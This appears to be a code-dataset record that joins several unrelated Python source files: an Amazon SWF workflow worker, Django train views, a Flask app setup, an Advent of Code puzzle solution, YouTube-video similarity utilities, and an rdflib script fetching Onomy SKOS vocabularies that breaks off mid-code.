def _subworkflow_call_key(w_id):
return w_id.split(':')[-1] | flowy/swf/worker.py | import os
import socket
import venusian
from botocore.exceptions import ClientError
from flowy.swf.client import SWFClient, IDENTITY_SIZE
from flowy.swf.decision import SWFActivityDecision
from flowy.swf.decision import SWFWorkflowDecision
from flowy.swf.history import SWFExecutionHistory
from flowy.utils import logger
from flowy.utils import setup_default_logger
from flowy.worker import Worker
__all__ = ['SWFWorkflowWorker', 'SWFActivityWorker']
class SWFWorker(Worker):
def __init__(self):
super(SWFWorker, self).__init__()
self.remote_reg_callbacks = []
def __call__(self, name, version, input_data, decision, *extra_args):
return super(SWFWorker, self).__call__(
(str(name), str(version)), input_data, decision, *extra_args)
def register_remote(self, swf_client, domain):
"""Register or check compatibility of all configs in Amazon SWF."""
for remote_reg_callback in self.remote_reg_callbacks:
# Raises if there are registration problems
remote_reg_callback(swf_client, domain)
def register(self, config, func, version, name=None):
super(SWFWorker, self).register(config, func, (name, version))
def add_remote_reg_callback(self, callback):
self.remote_reg_callbacks.append(callback)
def make_scanner(self):
return venusian.Scanner(
register_task=self.register_task,
add_remote_reg_callback=self.add_remote_reg_callback)
class SWFWorkflowWorker(SWFWorker):
categories = ['swf_workflow']
# Be explicit about what arguments are expected
def __call__(self, name, version, input_data, decision, execution_history):
super(SWFWorkflowWorker, self).__call__(
name, version, input_data, decision, # needed for worker logic
decision, execution_history) # extra_args passed to proxies
def break_loop(self):
"""Used to exit the loop in tests. Return True to break."""
return False
def run_forever(self, domain, task_list,
swf_client=None,
setup_log=True,
register_remote=True,
identity=None):
"""Starts an endless single threaded/single process worker loop.
The worker polls endlessly for new decisions from the specified domain
and task list and runs them.
If reg_remote is set, all registered workflow are registered remotely.
An identity can be set to track this worker in the SWF console,
otherwise a default identity is generated from this machine domain and
process pid.
If setup_log is set, a default configuration for the logger is loaded.
A custom SWF client can be passed in swf_client, otherwise a default
client is used.
"""
if setup_log:
setup_default_logger()
identity = default_identity() if identity is None else identity
swf_client = SWFClient() if swf_client is None else swf_client
if register_remote:
self.register_remote(swf_client, domain)
try:
while 1:
if self.break_loop():
break
name, version, input_data, exec_history, decision = poll_decision(
swf_client, domain, task_list, identity)
self(name, version, input_data, decision, exec_history)
except KeyboardInterrupt:
pass
class SWFActivityWorker(SWFWorker):
categories = ['swf_activity']
# Be explicit about what arguments are expected
def __call__(self, name, version, input_data, decision):
# No extra arguments are used
super(SWFActivityWorker, self).__call__(
name, version, input_data, decision, # needed for worker logic
decision.heartbeat) # extra_args
def break_loop(self):
"""Used to exit the loop in tests. Return True to break."""
return False
def run_forever(self, domain, task_list,
swf_client=None,
setup_log=True,
register_remote=True,
identity=None):
"""Same as SWFWorkflowWorker.run_forever but for activities."""
if setup_log:
setup_default_logger()
identity = default_identity() if identity is None else identity
swf_client = SWFClient() if swf_client is None else swf_client
if register_remote:
self.register_remote(swf_client, domain)
try:
while 1:
if self.break_loop():
break
swf_response = {}
while not swf_response.get('taskToken'):
try:
swf_response = swf_client.poll_for_activity_task(
domain, task_list, identity=identity)
except ClientError:
# add a delay before retrying?
logger.exception('Error while polling for activities:')
at = swf_response['activityType']
decision = SWFActivityDecision(swf_client, swf_response['taskToken'])
self(at['name'], at['version'], swf_response['input'], decision)
except KeyboardInterrupt:
pass
def default_identity():
"""Generate a local identity string for this process."""
identity = "%s-%s" % (socket.getfqdn(), os.getpid())
return identity[-IDENTITY_SIZE:] # keep the most important part
def poll_decision(swf_client, domain, task_list, identity=None):
"""Poll a decision and create a SWFWorkflowContext structure.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll decision
:param identity: an identity str of the request maker
:rtype: tuple
:returns: a tuple consisting of (name, version, input_data,
:class:'SWFExecutionHistory', :class:`SWFWorkflowDecision`)
"""
first_page = poll_first_page(swf_client, domain, task_list, identity)
token = first_page['taskToken']
all_events = events(swf_client, domain, task_list, first_page, identity)
# Sometimes the first event is on the second page,
# and the first page is empty
first_event = next(all_events)
assert first_event['eventType'] == 'WorkflowExecutionStarted'
wesea = 'workflowExecutionStartedEventAttributes'
assert first_event[wesea]['taskList']['name'] == task_list
task_duration = first_event[wesea]['taskStartToCloseTimeout']
workflow_duration = first_event[wesea]['executionStartToCloseTimeout']
tags = first_event[wesea].get('tagList', None)
child_policy = first_event[wesea]['childPolicy']
name = first_event[wesea]['workflowType']['name']
version = first_event[wesea]['workflowType']['version']
input_data = first_event[wesea]['input']
try:
running, timedout, results, errors, order = load_events(all_events)
except _PaginationError:
# There's nothing better to do than to retry
return poll_decision(swf_client, domain, task_list, identity)
execution_history = SWFExecutionHistory(running, timedout, results, errors, order)
decision = SWFWorkflowDecision(swf_client, token, name, version, task_list,
task_duration, workflow_duration, tags,
child_policy)
return name, version, input_data, execution_history, decision
def poll_first_page(swf_client, domain, task_list, identity=None):
"""Return the response from loading the first page. In case of errors,
empty responses or whatnot retry until a valid response.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param identity: an identity str of the request maker
:rtype: dict[str, str|int|list|dict]
:returns: a dict containing workflow information and list of events
"""
swf_response = {}
while not swf_response.get('taskToken'):
try:
swf_response = swf_client.poll_for_decision_task(domain, task_list,
identity=identity)
except ClientError:
logger.exception('Error while polling for decisions:')
return swf_response
def poll_page(swf_client, domain, task_list, token, identity=None):
"""Return a specific page. In case of errors retry a number of times.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param token: the token string for the requested page
:param identity: an identity str of the request maker
:rtype: dict[str, str|int|list|dict]
:returns: a dict containing workflow information and list of events
"""
for _ in range(7): # give up after a limited number of retries
try:
swf_response = swf_client.poll_for_decision_task(
domain, task_list, identity=identity, next_page_token=token)
break
except ClientError:
logger.exception('Error while polling for decision page:')
else:
raise _PaginationError()
return swf_response
def events(swf_client, domain, task_list, first_page, identity=None):
"""Load pages one by one and generate all events found.
:type swf_client: :class:`SWFClient`
:param swf_client: an implementation or duck typing of :class:`SWFClient`
:param domain: the domain containing the task list to poll
:param task_list: the task list from which to poll for events
:param first_page: the page dict structure from which to start generating
the events, usually the response from :func:`poll_first_page`
:param identity: an identity str of the request maker
:rtype: collections.Iterator[dict[str, int|str|dict[str, int|str|dict]]
:returns: iterator over all of the events
"""
page = first_page
while 1:
for event in page['events']:
yield event
if not page.get('nextPageToken'):
break
page = poll_page(swf_client, domain, task_list, page['nextPageToken'],
identity=identity)
def load_events(event_iter):
"""Combine all events in their order.
This returns a tuple of the following things:
running - a set of the ids of running tasks
timedout - a set of the ids of tasks that have timedout
results - a dictionary of id -> result for each finished task
errors - a dictionary of id -> error message for each failed task
order - an list of task ids in the order they finished
"""
running, timedout = set(), set()
results, errors = {}, {}
order = []
event2call = {}
for event in event_iter:
e_type = event.get('eventType')
if e_type == 'ActivityTaskScheduled':
eid = event['activityTaskScheduledEventAttributes']['activityId']
event2call[event['eventId']] = eid
running.add(eid)
elif e_type == 'ActivityTaskCompleted':
atcea = 'activityTaskCompletedEventAttributes'
eid = event2call[event[atcea]['scheduledEventId']]
result = event[atcea]['result']
running.remove(eid)
results[eid] = result
order.append(eid)
elif e_type == 'ActivityTaskFailed':
atfea = 'activityTaskFailedEventAttributes'
eid = event2call[event[atfea]['scheduledEventId']]
reason = event[atfea]['reason']
running.remove(eid)
errors[eid] = reason
order.append(eid)
elif e_type == 'ActivityTaskTimedOut':
attoea = 'activityTaskTimedOutEventAttributes'
eid = event2call[event[attoea]['scheduledEventId']]
running.remove(eid)
timedout.add(eid)
order.append(eid)
elif e_type == 'ScheduleActivityTaskFailed':
satfea = 'scheduleActivityTaskFailedEventAttributes'
eid = event[satfea]['activityId']
reason = event[satfea]['cause']
# when a job is not found it's not even started
errors[eid] = reason
order.append(eid)
elif e_type == 'StartChildWorkflowExecutionInitiated':
scweiea = 'startChildWorkflowExecutionInitiatedEventAttributes'
eid = _subworkflow_call_key(event[scweiea]['workflowId'])
running.add(eid)
elif e_type == 'ChildWorkflowExecutionCompleted':
cwecea = 'childWorkflowExecutionCompletedEventAttributes'
eid = _subworkflow_call_key(
event[cwecea]['workflowExecution']['workflowId'])
result = event[cwecea]['result']
running.remove(eid)
results[eid] = result
order.append(eid)
elif e_type == 'ChildWorkflowExecutionFailed':
cwefea = 'childWorkflowExecutionFailedEventAttributes'
eid = _subworkflow_call_key(
event[cwefea]['workflowExecution']['workflowId'])
reason = event[cwefea]['reason']
running.remove(eid)
errors[eid] = reason
order.append(eid)
elif e_type == 'ChildWorkflowExecutionTimedOut':
cwetoea = 'childWorkflowExecutionTimedOutEventAttributes'
eid = _subworkflow_call_key(
event[cwetoea]['workflowExecution']['workflowId'])
running.remove(eid)
timedout.add(eid)
order.append(eid)
elif e_type == 'StartChildWorkflowExecutionFailed':
scwefea = 'startChildWorkflowExecutionFailedEventAttributes'
eid = _subworkflow_call_key(event[scwefea]['workflowId'])
reason = event[scwefea]['cause']
errors[eid] = reason
order.append(eid)
elif e_type == 'TimerStarted':
eid = event['timerStartedEventAttributes']['timerId']
running.add(eid)
elif e_type == 'TimerFired':
eid = event['timerFiredEventAttributes']['timerId']
running.remove(eid)
results[eid] = None
return running, timedout, results, errors, order
class _PaginationError(Exception):
"""Can't retrieve the next page after X retries."""
def _subworkflow_call_key(w_id):
return w_id.split(':')[-1] | 0.621656 | 0.103386 |
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.core.mail import message
from django.core.paginator import Paginator
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import DetailView, CreateView, UpdateView, DeleteView, ListView
from trains.forms import TrainForm
from trains.models import Train
def home(request):
qs = Train.objects.all()
paginator = Paginator(qs, 3)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
context = {'page_obj': page_obj}
return render(request, 'trains/home.html', context)
class TrainListView(ListView):
paginate_by = 5
model = Train
template_name = 'trains/home.html'
class TrainDetailView(DetailView):
queryset = Train.objects.all()
template_name = 'trains/detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
form = TrainForm
context['form'] = form
return context
class TrainCreateView(SuccessMessageMixin, LoginRequiredMixin, CreateView):
model = Train
form_class = TrainForm
template_name = 'trains/create.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно создан'
class TrainUpdateView(SuccessMessageMixin, LoginRequiredMixin, UpdateView):
model = Train
form_class = TrainForm
template_name = 'trains/update.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно отредактирован'
class TrainDeleteView(SuccessMessageMixin, LoginRequiredMixin, DeleteView):
model = Train
success_url = reverse_lazy('trains:home')
# template_name = 'cities/delete.html' # страница подтверждения
def get(self, request, *args, **kwargs):
"""Удаление без подтверждения"""
messages.success(request, 'Поезд удален')
return self.post(request, *args, **kwargs) | src/trains/views.py | from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.contrib.messages.views import SuccessMessageMixin
from django.core.mail import message
from django.core.paginator import Paginator
from django.shortcuts import render
from django.urls import reverse_lazy
from django.views.generic import DetailView, CreateView, UpdateView, DeleteView, ListView
from trains.forms import TrainForm
from trains.models import Train
def home(request):
qs = Train.objects.all()
paginator = Paginator(qs, 3)
page_number = request.GET.get('page')
page_obj = paginator.get_page(page_number)
context = {'page_obj': page_obj}
return render(request, 'trains/home.html', context)
class TrainListView(ListView):
paginate_by = 5
model = Train
template_name = 'trains/home.html'
class TrainDetailView(DetailView):
queryset = Train.objects.all()
template_name = 'trains/detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
form = TrainForm
context['form'] = form
return context
class TrainCreateView(SuccessMessageMixin, LoginRequiredMixin, CreateView):
model = Train
form_class = TrainForm
template_name = 'trains/create.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно создан'
class TrainUpdateView(SuccessMessageMixin, LoginRequiredMixin, UpdateView):
model = Train
form_class = TrainForm
template_name = 'trains/update.html'
success_url = reverse_lazy('trains:home')
success_message = 'Поезд успешно отредактирован'
class TrainDeleteView(SuccessMessageMixin, LoginRequiredMixin, DeleteView):
model = Train
success_url = reverse_lazy('trains:home')
# template_name = 'cities/delete.html' # страница подтверждения
def get(self, request, *args, **kwargs):
"""Удаление без подтверждения"""
messages.success(request, 'Поезд удален')
return self.post(request, *args, **kwargs) | 0.40439 | 0.084606 |
import base64
from decimal import Decimal
import gettext
import hashlib
import os.path
import flask
import werkzeug.routing
import werkzeug.utils
from api import api
from player import player
from root import root
from sql import db_connect, db_init, get_db, put_db
class DefaultConfig:
DATABASE = "postgresql:///trends"
TIMEOUT = 60000
def json_default(obj):
if isinstance(obj, Decimal):
return str(obj)
raise TypeError("Object of type '{}' is not JSON serializable" \
.format(type(obj).__name__))
def create_app():
app = flask.Flask(__name__)
app.config.from_object(DefaultConfig)
app.config.from_envvar('CONFIG', silent=True)
app.teardown_appcontext(put_db)
app.add_template_filter(any)
app.add_template_filter(all)
app.jinja_options['trim_blocks'] = True
app.jinja_options['lstrip_blocks'] = True
app.jinja_env.policies["json.dumps_kwargs"] = { 'default': json_default }
app.jinja_env.globals.update(zip=zip)
app.jinja_env.add_extension('jinja2.ext.do')
app.jinja_env.add_extension('jinja2.ext.i18n')
app.jinja_env.install_null_translations(newstyle=True)
app.register_blueprint(root)
app.register_blueprint(player, url_prefix='/player/<int:steamid>')
app.register_blueprint(api, url_prefix='/api/v1')
return app
application = create_app()
@application.template_filter('duration')
def duration_filter(timestamp):
mm, ss = divmod(timestamp, 60)
hh, mm = divmod(mm, 60)
if hh:
return "{:.0f}:{:02.0f}:{:02.0f}".format(hh, mm, ss)
else:
return "{:.0f}:{:02.0f}".format(mm, ss)
@application.template_filter('avatar')
def avatar_filter(hash, size='full'):
if not hash:
return ''
url = "https://steamcdn-a.akamaihd.net/steamcommunity/public/images/avatars/{}/{}{}.jpg"
return url.format(hash[:2], hash, {
'small': '',
'medium': '_medium',
'full': '_full',
}[size])
@application.template_filter()
def anynone(iterable):
for item in iterable:
if item is None:
return False
return True
application.static_cache = {}
@application.url_defaults
def foo(endpoint, values):
if endpoint != 'static' or 'filename' not in values:
return
filename = werkzeug.utils.safe_join(application.static_folder, values['filename'])
if not os.path.isfile(filename):
return
mtime, hash = application.static_cache.get(filename, (None, None))
if mtime == os.path.getmtime(filename):
values['h'] = hash
return
hash = hashlib.md5()
with open(filename, 'rb') as file:
hash.update(file.read())
hash = base64.urlsafe_b64encode(hash.digest())[:10]
application.static_cache[filename] = (mtime, hash)
values['h'] = hash
if __name__ == '__main__':
application.run() | trends.py |
import base64
from decimal import Decimal
import gettext
import hashlib
import os.path
import flask
import werkzeug.routing
import werkzeug.utils
from api import api
from player import player
from root import root
from sql import db_connect, db_init, get_db, put_db
class DefaultConfig:
DATABASE = "postgresql:///trends"
TIMEOUT = 60000
def json_default(obj):
if isinstance(obj, Decimal):
return str(obj)
raise TypeError("Object of type '{}' is not JSON serializable" \
.format(type(obj).__name__))
def create_app():
app = flask.Flask(__name__)
app.config.from_object(DefaultConfig)
app.config.from_envvar('CONFIG', silent=True)
app.teardown_appcontext(put_db)
app.add_template_filter(any)
app.add_template_filter(all)
app.jinja_options['trim_blocks'] = True
app.jinja_options['lstrip_blocks'] = True
app.jinja_env.policies["json.dumps_kwargs"] = { 'default': json_default }
app.jinja_env.globals.update(zip=zip)
app.jinja_env.add_extension('jinja2.ext.do')
app.jinja_env.add_extension('jinja2.ext.i18n')
app.jinja_env.install_null_translations(newstyle=True)
app.register_blueprint(root)
app.register_blueprint(player, url_prefix='/player/<int:steamid>')
app.register_blueprint(api, url_prefix='/api/v1')
return app
application = create_app()
@application.template_filter('duration')
def duration_filter(timestamp):
mm, ss = divmod(timestamp, 60)
hh, mm = divmod(mm, 60)
if hh:
return "{:.0f}:{:02.0f}:{:02.0f}".format(hh, mm, ss)
else:
return "{:.0f}:{:02.0f}".format(mm, ss)
@application.template_filter('avatar')
def avatar_filter(hash, size='full'):
if not hash:
return ''
url = "https://steamcdn-a.akamaihd.net/steamcommunity/public/images/avatars/{}/{}{}.jpg"
return url.format(hash[:2], hash, {
'small': '',
'medium': '_medium',
'full': '_full',
}[size])
@application.template_filter()
def anynone(iterable):
for item in iterable:
if item is None:
return False
return True
application.static_cache = {}
@application.url_defaults
def foo(endpoint, values):
if endpoint != 'static' or 'filename' not in values:
return
filename = werkzeug.utils.safe_join(application.static_folder, values['filename'])
if not os.path.isfile(filename):
return
mtime, hash = application.static_cache.get(filename, (None, None))
if mtime == os.path.getmtime(filename):
values['h'] = hash
return
hash = hashlib.md5()
with open(filename, 'rb') as file:
hash.update(file.read())
hash = base64.urlsafe_b64encode(hash.digest())[:10]
application.static_cache[filename] = (mtime, hash)
values['h'] = hash
if __name__ == '__main__':
application.run() | 0.462473 | 0.06767 |
class ListNode:
def __init__(self, data=None, next=None, prev=None):
self.data = data
self.next = next
self.prev = prev
def __repr__(self):
return repr(self.data)
class CircularDoublyLinkedList:
def __init__(self, list):
# Keep track of all the nodes to save look-up time
self.nodes = {}
# Head
self.head = ListNode(data=list[0], next=list[0], prev=list[0])
prev = self.head
self.nodes[list[0]] = self.head
# Load data
for data in list[1:]:
new = ListNode(data=data, prev=prev)
self.nodes[data] = new
prev.next = new
prev = new
new.next = self.head
self.head.prev = new
def __repr__(self):
nodes = []
curr = self.head
while curr:
nodes.append(repr(curr))
curr = curr.next
if curr == self.head:
break
return "[" + ", ".join(nodes) + "]"
def find(self, key):
return self.nodes.get(key, None)
def remove(self, start_node, length=1):
# build a circular sublist
end_node = start_node
removed_head = bool(start_node == self.head)
for _ in range(length - 1):
end_node = end_node.next
if end_node == self.head:
removed_head = True
if removed_head:
self.head = end_node.next
# tie the ends of the remaining of the original list
start_node.prev.next = end_node.next
end_node.next.prev = start_node.prev
return (start_node, start_node.next, end_node)
def insert_after(self, node, start_node, end_node):
node.next.prev = end_node
end_node.next = node.next
node.next = start_node
start_node.prev = node
def solve(cups, n_rounds):
curr = cups.head
for _ in range(n_rounds):
start_remove = curr.next
to_remove = cups.remove(start_remove, length=3)
removed_values = [node.data for node in to_remove]
destination = curr.data
while True:
destination = (destination - 1) % (n_cups + 1)
if destination in removed_values:
continue
elif destination > 0:
destination_node = cups.find(destination)
break
cups.insert_after(destination_node, to_remove[0], to_remove[-1])
curr = curr.next
node = cups.find(1)
result = 1
for _ in range(2):
node = node.next
result *= node.data
return result
n_cups = 1000000
n_rounds = 10000000
with open("day23.txt", "r") as f:
data = list(map(int, list(f.read().strip())))
data.extend(range(len(data) + 1, n_cups + 1))
cups = CircularDoublyLinkedList(data)
print(solve(cups, n_rounds)) | 2020/day23-2.py | class ListNode:
def __init__(self, data=None, next=None, prev=None):
self.data = data
self.next = next
self.prev = prev
def __repr__(self):
return repr(self.data)
class CircularDoublyLinkedList:
def __init__(self, list):
# Keep track of all the nodes to save look-up time
self.nodes = {}
# Head
self.head = ListNode(data=list[0], next=list[0], prev=list[0])
prev = self.head
self.nodes[list[0]] = self.head
# Load data
for data in list[1:]:
new = ListNode(data=data, prev=prev)
self.nodes[data] = new
prev.next = new
prev = new
new.next = self.head
self.head.prev = new
def __repr__(self):
nodes = []
curr = self.head
while curr:
nodes.append(repr(curr))
curr = curr.next
if curr == self.head:
break
return "[" + ", ".join(nodes) + "]"
def find(self, key):
return self.nodes.get(key, None)
def remove(self, start_node, length=1):
# build a circular sublist
end_node = start_node
removed_head = bool(start_node == self.head)
for _ in range(length - 1):
end_node = end_node.next
if end_node == self.head:
removed_head = True
if removed_head:
self.head = end_node.next
# tie the ends of the remaining of the original list
start_node.prev.next = end_node.next
end_node.next.prev = start_node.prev
return (start_node, start_node.next, end_node)
def insert_after(self, node, start_node, end_node):
node.next.prev = end_node
end_node.next = node.next
node.next = start_node
start_node.prev = node
def solve(cups, n_rounds):
curr = cups.head
for _ in range(n_rounds):
start_remove = curr.next
to_remove = cups.remove(start_remove, length=3)
removed_values = [node.data for node in to_remove]
destination = curr.data
while True:
destination = (destination - 1) % (n_cups + 1)
if destination in removed_values:
continue
elif destination > 0:
destination_node = cups.find(destination)
break
cups.insert_after(destination_node, to_remove[0], to_remove[-1])
curr = curr.next
node = cups.find(1)
result = 1
for _ in range(2):
node = node.next
result *= node.data
return result
n_cups = 1000000
n_rounds = 10000000
with open("day23.txt", "r") as f:
data = list(map(int, list(f.read().strip())))
data.extend(range(len(data) + 1, n_cups + 1))
cups = CircularDoublyLinkedList(data)
print(solve(cups, n_rounds)) | 0.690559 | 0.351395 |
import pickle
import plotly.express as px
import numpy as np
import gspread_dataframe as gd
import pandas as pd
from scipy.spatial.distance import pdist, squareform
def get_raw_data(context):
_query = '''
SELECT
*
FROM
`moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
WHERE
takedown = FALSE
'''
data = context['bq_client'].query(
_query
).result(
).to_dataframe(
bqstorage_client=context['bq_storage_client']
)
total_rows = len(data)
data.drop_duplicates(subset="video_id", keep='first',
inplace=True, ignore_index=True)
unique_rows = len(data)
if total_rows != unique_rows:
print(
f"Warning: raw table has {total_rows - unique_rows} duplicate rows or {100 * (total_rows - unique_rows) / unique_rows}%.")
return data
def update_from_raw_data(data, context):
_query = '''
SELECT
*
FROM
`moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
WHERE
takedown = FALSE
'''
new_data = context['bq_client'].query(
_query
).result(
).to_dataframe(
bqstorage_client=context['bq_storage_client']
).loc[lambda d: ~ d.video_id.isin(data.video_id)]
if len(new_data) > 0:
return pd.concat([data, new_data])
else:
print("Warning: no new data acquired.")
return data
def save_data(data, pickle_file, context):
with open(context['gdrive_path'] + pickle_file, 'wb') as handle:
pickle.dump(data, handle,
protocol=pickle.HIGHEST_PROTOCOL)
def load_data(pickle_file, context):
with open(context['gdrive_path'] + pickle_file, 'rb') as handle:
return pickle.load(handle)
def plot_similarity_matrix(m):
fig = px.imshow(m, width=1600, height=800)
fig.update_layout(
margin=dict(l=20, r=20, t=20, b=20),
paper_bgcolor="LightSteelBlue",
)
return fig
def get_indices_of_k_largest(arr, k):
arr[np.tril_indices(arr.shape[0], 0)] = np.nan
idx = np.argpartition((-arr).ravel(), k)
return tuple(np.array(np.unravel_index(idx, arr.shape))[:, range(min(k, 0), max(k, 0))])
def prep_videovote_sheet(data, pairs, tab, context, existing=None):
left = data.iloc[pairs[0]].reset_index()
right = data.iloc[pairs[1]].reset_index()
vvdata = pd.DataFrame({
"title_a": left.title,
"channel_a": left.channel,
"description_a": left.description,
"id_a": left.video_id,
"title_b": right.title,
"channel_b": right.channel,
"description_b": right.description,
"id_b": right.video_id,
"vote": None,
})
for i, r in vvdata.iterrows():
if r.id_a > r.id_b:
temp = (r.title_a, r.channel_a, r.description_a, r.id_a)
(r.title_a, r.channel_a, r.description_a, r.id_a) = (
r.title_b, r.channel_b, r.description_b, r.id_b)
(r.title_b, r.channel_b, r.description_b, r.id_b) = temp
if existing != None:
vvdata = vvdata[[(r.id_a, r.id_b) not in existing for i,
r in vvdata.iterrows()]]
ss = context['gspread_client'].open("Videovote backend")
try:
ws = ss.add_worksheet(tab, rows=len(vvdata), cols="9")
except Exception:
ws = ss.worksheet(tab)
gd.set_with_dataframe(ws, vvdata.reset_index(
drop=True), include_index=False)
def init_eval_pickle(name, context):
temp = {}
with open(context['gdrive_path'] + name, 'wb') as handle:
pickle.dump(temp, handle, protocol=pickle.HIGHEST_PROTOCOL)
def update_eval_data(eval_data, sheet, context):
ws = context['gspread_client'].open("Videovote backend").worksheet(sheet)
new_eval_data = gd.get_as_dataframe(ws).dropna(
axis=1, how='all').dropna(how='all')
for i, r in new_eval_data.iterrows():
key = (r.id_a, r.id_b)
if key in eval_data:
eval_data[key] = eval_data[key] + [r.vote]
else:
eval_data[key] = [r.vote]
return eval_data
def get_equality_matrix(data, part):
d = pdist([[i] for i in data[part]], lambda x, y: 1 if x == y else 0)
return squareform(d)
def print_data_diagnostics(data):
n = len(data)
print(f"Data is length {n}")
nt = len(data[data.transcript.str.len() > 0])
print(f"With transcripts: {nt}")
possible_parts = ["title", "transcript", "description", "thumbnail"]
possible_types = ["embedding", "entities"]
dups = len(data[data.video_id.duplicated()])
if dups != 0:
print(f"Warning! {dups} dupes detected.")
for part in possible_parts:
ap_n = nt if part == "transcript" else n
for type in possible_types:
if f"{part}_{type}" in data:
nv = data[f"{part}_{type}"].isnull().sum()
print(
f"Data has {part}_{type} for {n-nv} rows or {(n-nv)/ap_n * 100}%") | semanticdist/utils.py | import pickle
import plotly.express as px
import numpy as np
import gspread_dataframe as gd
import pandas as pd
from scipy.spatial.distance import pdist, squareform
def get_raw_data(context):
_query = '''
SELECT
*
FROM
`moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
WHERE
takedown = FALSE
'''
data = context['bq_client'].query(
_query
).result(
).to_dataframe(
bqstorage_client=context['bq_storage_client']
)
total_rows = len(data)
data.drop_duplicates(subset="video_id", keep='first',
inplace=True, ignore_index=True)
unique_rows = len(data)
if total_rows != unique_rows:
print(
f"Warning: raw table has {total_rows - unique_rows} duplicate rows or {100 * (total_rows - unique_rows) / unique_rows}%.")
return data
def update_from_raw_data(data, context):
_query = '''
SELECT
*
FROM
`moz-fx-data-shared-prod.regrets_reporter_analysis.yt_api_data_v7`
WHERE
takedown = FALSE
'''
new_data = context['bq_client'].query(
_query
).result(
).to_dataframe(
bqstorage_client=context['bq_storage_client']
).loc[lambda d: ~ d.video_id.isin(data.video_id)]
if len(new_data) > 0:
return pd.concat([data, new_data])
else:
print("Warning: no new data acquired.")
return data
def save_data(data, pickle_file, context):
with open(context['gdrive_path'] + pickle_file, 'wb') as handle:
pickle.dump(data, handle,
protocol=pickle.HIGHEST_PROTOCOL)
def load_data(pickle_file, context):
with open(context['gdrive_path'] + pickle_file, 'rb') as handle:
return pickle.load(handle)
def plot_similarity_matrix(m):
fig = px.imshow(m, width=1600, height=800)
fig.update_layout(
margin=dict(l=20, r=20, t=20, b=20),
paper_bgcolor="LightSteelBlue",
)
return fig
def get_indices_of_k_largest(arr, k):
arr[np.tril_indices(arr.shape[0], 0)] = np.nan
idx = np.argpartition((-arr).ravel(), k)
return tuple(np.array(np.unravel_index(idx, arr.shape))[:, range(min(k, 0), max(k, 0))])
def prep_videovote_sheet(data, pairs, tab, context, existing=None):
left = data.iloc[pairs[0]].reset_index()
right = data.iloc[pairs[1]].reset_index()
vvdata = pd.DataFrame({
"title_a": left.title,
"channel_a": left.channel,
"description_a": left.description,
"id_a": left.video_id,
"title_b": right.title,
"channel_b": right.channel,
"description_b": right.description,
"id_b": right.video_id,
"vote": None,
})
for i, r in vvdata.iterrows():
if r.id_a > r.id_b:
temp = (r.title_a, r.channel_a, r.description_a, r.id_a)
(r.title_a, r.channel_a, r.description_a, r.id_a) = (
r.title_b, r.channel_b, r.description_b, r.id_b)
(r.title_b, r.channel_b, r.description_b, r.id_b) = temp
if existing != None:
vvdata = vvdata[[(r.id_a, r.id_b) not in existing for i,
r in vvdata.iterrows()]]
ss = context['gspread_client'].open("Videovote backend")
try:
ws = ss.add_worksheet(tab, rows=len(vvdata), cols="9")
except Exception:
ws = ss.worksheet(tab)
gd.set_with_dataframe(ws, vvdata.reset_index(
drop=True), include_index=False)
def init_eval_pickle(name, context):
temp = {}
with open(context['gdrive_path'] + name, 'wb') as handle:
pickle.dump(temp, handle, protocol=pickle.HIGHEST_PROTOCOL)
def update_eval_data(eval_data, sheet, context):
ws = context['gspread_client'].open("Videovote backend").worksheet(sheet)
new_eval_data = gd.get_as_dataframe(ws).dropna(
axis=1, how='all').dropna(how='all')
for i, r in new_eval_data.iterrows():
key = (r.id_a, r.id_b)
if key in eval_data:
eval_data[key] = eval_data[key] + [r.vote]
else:
eval_data[key] = [r.vote]
return eval_data
def get_equality_matrix(data, part):
d = pdist([[i] for i in data[part]], lambda x, y: 1 if x == y else 0)
return squareform(d)
def print_data_diagnostics(data):
n = len(data)
print(f"Data is length {n}")
nt = len(data[data.transcript.str.len() > 0])
print(f"With transcripts: {nt}")
possible_parts = ["title", "transcript", "description", "thumbnail"]
possible_types = ["embedding", "entities"]
dups = len(data[data.video_id.duplicated()])
if dups != 0:
print(f"Warning! {dups} dupes detected.")
for part in possible_parts:
ap_n = nt if part == "transcript" else n
for type in possible_types:
if f"{part}_{type}" in data:
nv = data[f"{part}_{type}"].isnull().sum()
print(
f"Data has {part}_{type} for {n-nv} rows or {(n-nv)/ap_n * 100}%") | 0.363534 | 0.320476 |
from rdflib import Graph, URIRef, Namespace, Literal
from rdflib.namespace import FOAF, SKOS, DCTERMS
import requests
import json
links = ['http://onomy.org/published/73/skos',
'http://onomy.org/published/74/skos',
'https://onomy.org/published/83/skos',
'http://onomy.org/published/78/skos',
'http://onomy.org/published/81/skos',
'https://onomy.org/published/84/skos',
'http://onomy.org/published/75/skos',
'http://onomy.org/published/79/skos',
'http://onomy.org/published/72/skos'
]
if __name__ == '__main__':
for i, link in enumerate(links):
response = requests.get(link)
content = json.loads(response.text)
NOM = Namespace('http://onomy.org/onomy-ns#')
g = Graph()
g.bind('foaf', FOAF)
g.bind('onomy', NOM)
g.bind('dcterms', DCTERMS)
g.bind('skos', SKOS)
for subject in content:
s = URIRef(subject)
for predicate in content[subject]:
p = URIRef(predicate)
if isinstance(content[subject][predicate], list):
for obj in content[subject][predicate]:
if obj['type'] == 'uri':
o = URIRef(obj['value'])
elif obj['type'] == 'literal':
if 'lang' in obj:
o = Literal(obj['value'],
